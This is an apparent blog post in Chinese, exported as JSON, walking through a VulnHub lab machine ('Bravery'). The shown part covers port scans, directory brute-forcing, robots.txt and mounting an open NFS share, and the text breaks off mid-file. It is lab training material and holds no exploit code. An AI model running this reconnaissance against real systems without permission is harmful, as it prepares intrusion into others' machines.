{"id":444,"date":"2024-03-22T19:07:08","date_gmt":"2024-03-22T11:07:08","guid":{"rendered":"http:\/\/162.14.82.114\/?p=444"},"modified":"2024-03-22T19:07:08","modified_gmt":"2024-03-22T11:07:08","slug":"vulnhub-digitalworld-local-bravery","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/444\/03\/22\/2024\/","title":{"rendered":"Vulnhub&#8211;DIGITALWORLD.LOCAL-BRAVERY"},"content":{"rendered":"<h1>DigitalWorld.Local:Bravery<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906922.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906922.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322164505765\" \/><\/div><\/p>\n<p>\u6709\u53f2\u4ee5\u6765\u5728<code>vulnhub<\/code>\u4e0b\u7684\u6700\u5927\u7684\u9776\u573a\u4e86\uff0c\u5bb3\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906923.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906923.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322165102866\" \/><\/div><\/p>\n<p>\u65b0\u5efa\u4e00\u4e2a\u865a\u62df\u673a\uff0c\u5c06<code>iso<\/code>\u548c\u786c\u76d8\u6dfb\u52a0\u8fdb\u53bb\uff0c\u4f46\u662f\u4f1a\u51fa\u5947\u5947\u602a\u602a\u7684\u9519\u8bef\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>virtualbox<\/code>\u8fdb\u884c\u6253\u9776\u5427\u3002\uff08\u5c48\u670d.jpg\uff09<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906924.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906924.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322172624212\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u626b\u63cf\u4e00\u4e0b\uff0c\u770b\u770b\u5bf9\u4e0d\u5bf9\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906925.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906925.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322172717396\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u5927\u6982\u7387\u6ca1\u9519\u4e86\uff0c\u53ef\u4ee5\u5f00\u59cb\u653b\u51fb\u4e86\u3002<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 10.0.2.9 -- -A -sC -sV -sT -T4 <\/code><\/pre>\n<pre><code class=\"language-php\">PORT      STATE SERVICE     REASON  VERSION\n22\/tcp    open  ssh         syn-ack OpenSSH 7.4 (protocol 2.0)\n| ssh-hostkey: \n|   2048 4d:8f:bc:01:49:75:83:00:65:a9:53:a9:75:c6:57:33 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD0YSAbz4uaFpvXMZ\/Kk+NPx+Y6iCQ32DAtnRkdKL3hvPvDPjFFHhPl\/9qaZV5TQ9B2AoJ6mSph9ltbwzfbmgEhAvc0jv6GIDCCSt\/hxWDN4XoZZnQVq1ogaGciqTSAFEZZmE00owu5kagXeW15QfLIct4cX5iT69\/I8yIAkTTbtyUwguK9bYC\/kYn0Kcc5ffwsXPvCkNz+\/VlXTD5+2ffZMKlmCdgK33fkMAxReUDUM6+vC1zfHiv38ExbPD66Jgr3R9xvIGDFumNrjhpshm1c3\/eae0iTUOq6e7S5\/wA7ju5903aSBNjU3bg8sRk4EogicrgMWcQ7GiaW0BxTS\/HV\n|   256 92:f7:04:e2:09:aa:d0:d7:e6:fd:21:67:1f:bd:64:ce (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBDaEKUrMdgVvi1VuxIpXl8ky9NWDdJxdMJVZMaK2Vu+lPVroNrfzRpHNyIMF2qZPnP7g+DbKqDUfKt85aKQ+iA=\n|   256 fb:08:cd:e8:45:8c:1a:c1:06:1b:24:73:33:a5:e4:77 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINYfh4cM3l7YBnp8TjyBDgDOp5vghlVHGsIbZwdSldTT\n53\/tcp    open  domain      syn-ack dnsmasq 2.76\n| dns-nsid: \n|_  bind.version: dnsmasq-2.76\n80\/tcp    open  http        syn-ack Apache httpd 2.4.6 ((CentOS) OpenSSL\/1.0.2k-fips PHP\/5.4.16)\n|_http-server-header: Apache\/2.4.6 (CentOS) OpenSSL\/1.0.2k-fips PHP\/5.4.16\n| http-methods: \n|   Supported Methods: POST OPTIONS GET HEAD TRACE\n|_  Potentially risky methods: TRACE\n|_http-title: Apache HTTP Server Test Page powered by CentOS\n111\/tcp   open  rpcbind     syn-ack 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100003  3,4         2049\/tcp   nfs\n|   100003  3,4         2049\/tcp6  nfs\n|   100003  3,4         2049\/udp   nfs\n|   100003  3,4         2049\/udp6  nfs\n|   100005  1,2,3      20048\/tcp   mountd\n|   100005  1,2,3      20048\/tcp6  mountd\n|   100005  1,2,3      20048\/udp   mountd\n|   100005  1,2,3      20048\/udp6  mountd\n|   100021  1,3,4      37015\/udp6  nlockmgr\n|   100021  1,3,4      37641\/tcp6  nlockmgr\n|   100021  1,3,4      43969\/tcp   nlockmgr\n|   100021  1,3,4      58081\/udp   nlockmgr\n|   100024  1          33855\/tcp6  status\n|   100024  1          36324\/udp   status\n|   100024  1          37262\/udp6  status\n|   100024  1          52420\/tcp   status\n|   100227  3           2049\/tcp   nfs_acl\n|   100227  3           2049\/tcp6  nfs_acl\n|   100227  3           2049\/udp   nfs_acl\n|_  100227  3           2049\/udp6  nfs_acl\n139\/tcp   open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n443\/tcp   open  ssl\/http    syn-ack Apache httpd 2.4.6 ((CentOS) OpenSSL\/1.0.2k-fips PHP\/5.4.16)\n|_ssl-date: TLS randomness does not represent time\n| http-methods: \n|   Supported Methods: POST OPTIONS GET HEAD TRACE\n|_  Potentially risky methods: TRACE\n|_http-server-header: Apache\/2.4.6 (CentOS) OpenSSL\/1.0.2k-fips PHP\/5.4.16\n|_http-title: Apache HTTP Server Test Page powered by CentOS\n| ssl-cert: Subject: commonName=localhost.localdomain\/organizationName=SomeOrganization\/stateOrProvinceName=SomeState\/countryName=--\/localityName=SomeCity\/organizationalUnitName=SomeOrganizationalUnit\/emailAddress=root@localhost.localdomain\n| Issuer: commonName=localhost.localdomain\/organizationName=SomeOrganization\/stateOrProvinceName=SomeState\/countryName=--\/localityName=SomeCity\/organizationalUnitName=SomeOrganizationalUnit\/emailAddress=root@localhost.localdomain\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2018-06-10T15:53:25\n| Not valid after:  2019-06-10T15:53:25\n| MD5:   0fa7:c8d5:15ec:c28f:e37a:df78:dcf6:b49f\n| SHA-1: 1c6d:ee6d:1ab8:06c0:a8bf:da93:2a6f:f0f1:b758:5284\n| -----BEGIN CERTIFICATE-----\n| MIIEDjCCAvagAwIBAgICGhEwDQYJKoZIhvcNAQELBQAwgbsxCzAJBgNVBAYTAi0t\n| MRIwEAYDVQQIDAlTb21lU3RhdGUxETAPBgNVBAcMCFNvbWVDaXR5MRkwFwYDVQQK\n| DBBTb21lT3JnYW5pemF0aW9uMR8wHQYDVQQLDBZTb21lT3JnYW5pemF0aW9uYWxV\n| bml0MR4wHAYDVQQDDBVsb2NhbGhvc3QubG9jYWxkb21haW4xKTAnBgkqhkiG9w0B\n| CQEWGnJvb3RAbG9jYWxob3N0LmxvY2FsZG9tYWluMB4XDTE4MDYxMDE1NTMyNVoX\n| DTE5MDYxMDE1NTMyNVowgbsxCzAJBgNVBAYTAi0tMRIwEAYDVQQIDAlTb21lU3Rh\n| dGUxETAPBgNVBAcMCFNvbWVDaXR5MRkwFwYDVQQKDBBTb21lT3JnYW5pemF0aW9u\n| MR8wHQYDVQQLDBZTb21lT3JnYW5pemF0aW9uYWxVbml0MR4wHAYDVQQDDBVsb2Nh\n| bGhvc3QubG9jYWxkb21haW4xKTAnBgkqhkiG9w0BCQEWGnJvb3RAbG9jYWxob3N0\n| LmxvY2FsZG9tYWluMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr1yF\n| K207RnQKZQHi1Y19N0itNM9ifUPoYwWJnxwXdgTk0CURDteNoY7pSoY83sZ8TS\/V\n| 58KawoWMF3nZpzjhqS6MFKUgzVquc+L1M2bIzhlwtSj5x4AdzjhrZlh74bflR8sd\n| fdmxECPb899mjm\/ocgRichQwqMn8b9wysoFjQJlPbke5WalunHS3Xx+IFIi4xs3E\n| 33sKlUU1FTN5Ho3Ve6shZ2Gjs6diKfdeQo+L87YB66dMaFJXwWzVB9LpFzuhOukC\n| qjoo8HDOoH\/j69ATqu\/hJSFZremv3Tur+k7jYrpSjBuls2BNa+656HrZaJ+kUyCA\n| UAMMx1NppbhTOkaNsQIDAQABoxowGDAJBgNVHRMEAjAAMAsGA1UdDwQEAwIF4DAN\n| BgkqhkiG9w0BAQsFAAOCAQEABfcnoyYjzMDBxQhPys4NoE8SnNzq8xatrKRpRjh9\n| I6Ipdl7\/GY2v7FK+h7vQLB92vl6uJ2PiFRdjWYy8y9cgLlNoh84Jq2BegmcEFhzF\n| robOXjxgbluKIL1q\/0WQQ3rDRvz\/dGjQvBt\/CDXQyFUFQ24eyGOQNFSR8ovopJOj\n| l77vsPID4za7cQfmRvRPbI8HfQBwk\/VqFNAxL\/ni9WtwO7P6UrBHEtsgSyXGD3Io\n| mTFEAQxZ5nnCggx81Q\/5SWMGDdmfavaKtKpa8WCmfTXTZJxSBuD9ktDxSLvw1vvW\n| GuHeg0BoUBX3xIoNVMPgoFnDgiSjc0jgb4KjODz6A+p6JQ==\n|_-----END CERTIFICATE-----\n445\/tcp   open  netbios-ssn syn-ack Samba smbd 4.7.1 (workgroup: WORKGROUP)\n2049\/tcp  open  nfs_acl     syn-ack 3 (RPC #100227)\n3306\/tcp  open  mysql       syn-ack MariaDB (unauthorized)\n8080\/tcp  open  http        syn-ack nginx 1.12.2\n| http-robots.txt: 4 disallowed entries \n|_\/cgi-bin\/ \/qwertyuiop.html \/private \/public\n|_http-open-proxy: Proxy might be redirecting requests\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-server-header: nginx\/1.12.2\n|_http-title: Welcome to Bravery! This is SPARTA!\n20048\/tcp open  mountd      syn-ack 1-3 (RPC #100005)\n43969\/tcp open  nlockmgr    syn-ack 1-4 (RPC #100021)\n52420\/tcp open  status      syn-ack 1 (RPC #100024)\nService Info: Host: BRAVERY\n\nHost script results:\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 22512\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 19413\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 44857\/udp): CLEAN (Failed to receive data)\n|   Check 4 (port 21337\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| nbstat: NetBIOS name: BRAVERY, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)\n| Names:\n|   BRAVERY&lt;00&gt;          Flags: &lt;unique&gt;&lt;active&gt;\n|   BRAVERY&lt;03&gt;          Flags: &lt;unique&gt;&lt;active&gt;\n|   BRAVERY&lt;20&gt;          Flags: &lt;unique&gt;&lt;active&gt;\n|   \\x01\\x02__MSBROWSE__\\x02&lt;01&gt;  Flags: &lt;group&gt;&lt;active&gt;\n|   WORKGROUP&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   WORKGROUP&lt;1d&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;1e&gt;        Flags: &lt;group&gt;&lt;active&gt;\n| Statistics:\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_clock-skew: mean: 1h20m00s, deviation: 2h18m33s, median: 0s\n| smb2-time: \n|   date: 2024-03-22T09:28:47\n|_  start_date: N\/A\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n| smb-os-discovery: \n|   OS: Windows 6.1 (Samba 4.7.1)\n|   Computer name: localhost\n|   NetBIOS computer name: BRAVERY\\x00\n|   Domain name: \\x00\n|   FQDN: localhost\n|_  System time: 2024-03-22T05:28:47-04:00\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<p>\u5f00\u542f\u4e86<code>80<\/code>\u7aef\u53e3\u548c<code>8080<\/code>\u7aef\u53e3\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906926.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906926.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322173052271\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906927.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906927.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322173111381\" style=\"zoom:25%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">feroxbuster -u http:\/\/10.0.2.9<\/code><\/pre>\n<pre><code class=\"language-text\">301      GET        7l       20w      232c http:\/\/10.0.2.9\/uploads =&gt; http:\/\/10.0.2.9\/uploads\/\n200      GET       28l      100w     7010c http:\/\/10.0.2.9\/images\/poweredby.png\n200      GET        6l       51w     3487c http:\/\/10.0.2.9\/images\/apache_pb.gif\n200      GET      132l      307w     5081c http:\/\/10.0.2.9\/noindex\/css\/open-sans.css\n200      GET        1l        7w       79c http:\/\/10.0.2.9\/about\n200      GET        1l        1w        2c http:\/\/10.0.2.9\/1\n200      GET        1l        1w        2c http:\/\/10.0.2.9\/9\n200      GET        1l        1w        2c http:\/\/10.0.2.9\/7\n200      GET        1l        1w        2c http:\/\/10.0.2.9\/5\n200      GET        1l        1w        2c http:\/\/10.0.2.9\/2\n200      GET        1l        1w        2c http:\/\/10.0.2.9\/3\n200      GET        1l        6w       30c http:\/\/10.0.2.9\/8\n200      GET        1l        5w       27c http:\/\/10.0.2.9\/contactus\n200      GET        1l        1w        2c http:\/\/10.0.2.9\/4\n200      GET        1l        1w        2c http:\/\/10.0.2.9\/0\n200      GET        1l        1w        2c http:\/\/10.0.2.9\/6\n200      GET        7l      340w    19341c http:\/\/10.0.2.9\/noindex\/css\/bootstrap.min.css\n403      GET      120l      540w     4897c http:\/\/10.0.2.9\/<\/code><\/pre>\n<p>\u4e3a\u4e86\u65b9\u4fbf\u4e3b\u673a\u8bbf\u95ee\u6211\u4e34\u65f6\u6539\u4e86\u4e00\u4e0b\u6865\u63a5\uff1a\u65b0IP<code>10.160.86.46<\/code><\/p>\n<pre><code class=\"language-bash\">dirb http:\/\/10.160.86.46:8080\/<\/code><\/pre>\n<pre><code class=\"language-text\">---- Scanning URL: http:\/\/10.160.86.46:8080\/ ----\n+ http:\/\/10.160.86.46:8080\/about (CODE:200|SIZE:503)                                                                  \n+ http:\/\/10.160.86.46:8080\/index.html (CODE:200|SIZE:2637)                                                            \n==&gt; DIRECTORY: http:\/\/10.160.86.46:8080\/private\/                                                                      \n==&gt; DIRECTORY: http:\/\/10.160.86.46:8080\/public\/                                                                       \n+ http:\/\/10.160.86.46:8080\/robots.txt (CODE:200|SIZE:103)                                                             \n\n---- Entering directory: http:\/\/10.160.86.46:8080\/private\/ ----\n(!) WARNING: All responses for this directory seem to be CODE = 403.                                                  \n    (Use mode &#039;-w&#039; if you want to scan it anyway)\n\n---- Entering directory: http:\/\/10.160.86.46:8080\/public\/ ----\n==&gt; DIRECTORY: http:\/\/10.160.86.46:8080\/public\/css\/                                                                   \n==&gt; DIRECTORY: http:\/\/10.160.86.46:8080\/public\/fonts\/                                                                 \n==&gt; DIRECTORY: http:\/\/10.160.86.46:8080\/public\/img\/                                                                   \n+ http:\/\/10.160.86.46:8080\/public\/index.html (CODE:200|SIZE:22963)                                                    \n==&gt; DIRECTORY: http:\/\/10.160.86.46:8080\/public\/js\/                                                                    \n\n---- Entering directory: http:\/\/10.160.86.46:8080\/public\/css\/ ----\n==&gt; DIRECTORY: http:\/\/10.160.86.46:8080\/public\/css\/theme\/                                                             \n\n---- Entering directory: http:\/\/10.160.86.46:8080\/public\/fonts\/ ----\n\n---- Entering directory: http:\/\/10.160.86.46:8080\/public\/img\/ ----\n==&gt; DIRECTORY: http:\/\/10.160.86.46:8080\/public\/img\/elements\/                                                          \n\n---- Entering directory: http:\/\/10.160.86.46:8080\/public\/js\/ ----\n==&gt; DIRECTORY: http:\/\/10.160.86.46:8080\/public\/js\/vendor\/                                                             \n\n---- Entering directory: http:\/\/10.160.86.46:8080\/public\/css\/theme\/ ----\n---- Entering directory: http:\/\/10.160.86.46:8080\/public\/img\/elements\/ ----\n---- Entering directory: http:\/\/10.160.86.46:8080\/public\/js\/vendor\/ ----<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u6316\u6398<\/h2>\n<h3>\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-php\">\/\/ http:\/\/10.160.86.46:8080\/robots.txt\nUser-agent: *\nDisallow: \/cgi-bin\/\nDisallow: \/qwertyuiop.html\nDisallow: \/private\nDisallow: \/public<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906928.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906928.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322175055501\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906929.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906929.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322175120401\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u6ca1\u6709\u53d1\u73b0\u5565\uff0c\u770b\u4e00\u4e0b<code>uploads<\/code>\uff0c\u53ea\u6709\u4e00\u4e2a\u4e1c\u897f\uff1a<\/p>\n<pre><code class=\"language-text\">http:\/\/10.160.86.46\/uploads\/files\/internal\/department\/procurement\/sara\/note.txt\nRemind gen to set up my cuppaCMS account.<\/code><\/pre>\n<p>\u4f3c\u4e4e\u662f<code>cuppaCMS<\/code>\u5efa\u7684\u3002<\/p>\n<h3>\u8bbf\u95ee\u90e8\u5206\u7aef\u53e3<\/h3>\n<p>\u53d1\u73b0\u5f00\u542f\u4e86<code>NFS<\/code>\u548c<code>smb<\/code>\u670d\u52a1\uff0c\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n<h4>NFS\u670d\u52a1<\/h4>\n<pre><code class=\"language-bash\">showmount -e 10.160.86.46\n# Export list for 10.160.86.46:\n# \/var\/nfsshare *\nmount 10.160.86.46:\/var\/nfsshare \/home\/kali\/temp\/tempnfs<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906930.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906930.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322175927266\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u76f8\u5173\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-bash\">ls -la\n# total 28\n# drwxrwxrwx 3 nobody nogroup  146 Dec 26  2018 .\n# drwxr-xr-x 4 kali   kali    4096 Mar 22 05:56 ..\n# -rw-r--r-- 1 root   root      29 Dec 26  2018 discovery\n# -rw-r--r-- 1 root   root      51 Dec 26  2018 enumeration\n# -rw-r--r-- 1 root   root      20 Dec 26  2018 explore\n# drwxr-xr-x 2 root   root      19 Dec 26  2018 itinerary\n# -rw-r--r-- 1 root   root     104 Dec 26  2018 password.txt\n# -rw-r--r-- 1 root   root      67 Dec 26  2018 qwertyuioplkjhgfdsazxcvbnm\n# -rw-r--r-- 1 root   root      15 Dec 26  2018 README.txt\n\nfile *                              \n# discovery:                  ASCII text\n# enumeration:                ASCII text\n# explore:                    ASCII text\n# itinerary:                  directory\n# password.txt:               ASCII text\n# qwertyuioplkjhgfdsazxcvbnm: ASCII text\n# README.txt:                 ASCII text\n\ncat discovery             \n# Remember to LOOK AROUND YOU!\n\ncat enumeration\n# Enumeration is at the heart of a penetration test!\n\ncat explore    \n# Exploration is fun!\n\ncat password.txt\n# Passwords should not be stored in clear-text, written in post-its or written on files on the hard disk!\n\ncat qwertyuioplkjhgfdsazxcvbnm\n# Sometimes, the answer you seek may be right before your very eyes.\n\ncat README.txt                \n# read me first!\n\ncd itinerary              \n\nls -la\n# total 4\n# drwxr-xr-x 2 root   root      19 Dec 26  2018 .\n# drwxrwxrwx 3 nobody nogroup  146 Dec 26  2018 ..\n# -rw-r--r-- 1 root   root    1733 Dec 26  2018 david\n\ncat david     \n# David will need to fly to various cities for various conferences. Here is his schedule.\n\n# 1 January 2019 (Tuesday):\n# New Year&#039;s Day. Spend time with family.\n\n# 2 January 2019 (Wednesday): \n# 0900: Depart for airport.\n# 0945: Check in at Changi Airport, Terminal 3.\n# 1355 - 2030 hrs (FRA time): Board flight (SQ326) and land in Frankfurt.\n# 2230: Check into hotel.\n\n# 3 January 2019 (Thursday):\n# 0800: Leave hotel.\n# 0900 - 1700: Attend the Banking and Enterprise Conference.\n# 1730 - 2130: Private reception with the Chancellor.\n# 2230: Retire in hotel.\n\n# 4 January 2019 (Friday):\n# 0800: Check out from 